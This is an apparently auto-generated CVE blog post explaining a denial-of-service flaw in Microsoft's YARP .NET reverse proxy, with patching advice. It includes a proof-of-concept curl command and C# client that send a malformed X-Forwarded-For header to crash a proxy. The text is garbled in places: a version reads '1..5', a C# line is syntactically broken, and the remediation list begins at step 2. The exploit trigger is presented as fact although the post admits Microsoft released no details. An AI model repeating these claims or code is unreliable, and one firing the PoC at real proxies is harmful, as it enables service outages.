CVE CyberSecurity Database News

CVE-2022-26924 - YARP Denial of Service Vulnerability Explained

Poster -

In April 2022, Microsoft published an advisory (MSRC CVE-2022-26924) about a Denial of Service (DoS) vulnerability in YARP—the “Yet Another Reverse Proxy” library for .NET. If you’re using YARP to route traffic in your web services, this bug could let a remote attacker crash your entire proxy by sending a specially crafted HTTP request.

This post demystifies the bug, shows a proof-of-concept exploit, and gives plain English recommendations for patching your system. We’ll include references, code snippets, and practical advice—all in plain American English.

What Is YARP?

YARP (Yet Another Reverse Proxy) is a Microsoft open-source library designed to let you build reverse proxies in C#/.NET with ease. Many web apps use it to balance loads and route client requests to backend services.

If an attacker can bring down YARP, your clients can’t reach your services. That’s why DoS risks in proxies are particularly sensitive.

The Vulnerability in Simple Terms

CVE-2022-26924 affects YARP versions prior to 1.1.2 and 1..5. The bug is in how YARP handles certain kinds of HTTP requests. Attackers can crash the YARP process by sending a specially crafted HTTP request that the library mishandles—triggering an unhandled exception and a service outage.

In short:
> Untrusted client sends a malformed request.
> YARP doesn’t handle it gracefully.
> Proxy process crashes.
> The service is down for everyone until you restart it.

Official References & Details

- Microsoft Security Advisory
- NVD: CVE-2022-26924 Details
- YARP Github Issue #1654
- YARP Release Notes v1.1.2

Vulnerable Code Pattern

The actual vulnerable code is in YARP’s pipeline for handling HTTP requests, especially where it parses headers and routes traffic. When given unexpected or malformed input, the application throws an exception but YARP doesn't catch it at all layers, causing the process to crash.

*Here’s a simplified code snippet (not the full vulnerable code but similar to affected logic):*

public async Task InvokeAsync(HttpContext context)
{
    try
    {
        // ...parse incoming HTTP request...
        string headerValue = context.Request.Headers["Some-Header"];
        // Vulnerable: doesn't check input and expects header format is always valid.
        var parts = headerValue.Split(','); // Throws if headerValue is null!
        // ...use parts...
    }
    catch (Exception)
    {
        // Rethrow or let it crash: process will terminate
        throw;
    }
}

Comment: If headerValue is null or invalid, an exception is thrown. In the real exploit, something similar happens with request headers or bodies triggering an unhandled parsing error, crashing the proxy.

Exploit Details: Proof-of-Concept (PoC)

While Microsoft didn’t release full details, researchers and users discovered that you could trigger the DoS by sending requests with malformed headers or badly formatted values that caused parser errors.

Here’s a simplified PoC with curl

# Send a request with an invalid 'X-Forwarded-For' header (replace URL/port)
curl -H "X-Forwarded-For: ,,,badheader" http://your-yarp-proxy:port/

If your YARP proxy is vulnerable and handling the header unexpectedly, this may crash the process, depending on the configuration.

C# Example to automate

using System.Net.Http;

var client = new HttpClient();
var request = new HttpRequestMessage(HttpMethod.Get, "http://localhost:500";);
request.Headers.Add("X-Forwarded-For", ",,,badheader"); // Malformed header
var response = await client.SendAsync(request);

Use NuGet or your favorite package manager

dotnet add package Yarp.ReverseProxy --version 1.1.2

2. Restart the Proxy
Make sure to restart your services after updating for the patch to take effect.

3. Defensive Programming
If you’re writing reverse proxies, always check incoming headers and never trust format or presence.

Conclusion

CVE-2022-26924 is a classic denial of service bug in YARP, triggered by an untrusted malformed HTTP header leading to a proxy crash. With proof-of-concept examples as above, it’s easy for attackers to cause downtime for unpatched services.

Further Reading

- Microsoft Blog: YARP Security Advisories
- Upgrading YARP Guide

Timeline

Published on: 04/15/2022 19:15:00 UTC
Last modified on: 04/25/2022 18:33:00 UTC